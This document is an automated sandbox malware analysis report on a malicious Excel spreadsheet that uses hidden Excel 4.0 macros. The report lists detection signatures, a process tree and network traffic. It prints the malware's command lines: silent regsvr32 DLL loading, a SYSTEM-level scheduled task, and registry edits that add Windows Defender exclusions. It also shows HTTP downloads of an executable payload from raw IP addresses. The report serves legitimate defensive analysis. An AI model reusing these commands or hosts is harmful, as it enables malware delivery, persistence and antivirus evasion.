Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Compensation-1730406737-09272021.xls

Overview

General Information

Sample Name:Compensation-1730406737-09272021.xls
Analysis ID:491509
MD5:b4b3a2223765ac84c9b1b05dbf7c6503
SHA1:57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
SHA256:3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2528 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2084 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1928 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2008 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 264 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 584 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2228 cmdline: -silent ..\Drezd1.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2608 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 2280 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2624 cmdline: -silent ..\Drezd2.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 408 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • regsvr32.exe (PID: 804 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • regsvr32.exe (PID: 2816 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1124 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2540 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 672 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2064 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2624 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Compensation-1730406737-09272021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2528, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 2084
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2084, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 1928

    Persistence and Installation Behavior:

    barindex
    Sigma detected: Schedule system processShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2008, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05, ProcessId: 264

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].datJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].datJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].datJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44466.7022844907[1].dat.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:09 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:11 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:12 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.422807773.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.420832394.0000000001BC0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.433067223.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.430171202.0000000000950000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000002.433161953.0000000002190000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].datJump to behavior
    Source: global trafficHTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
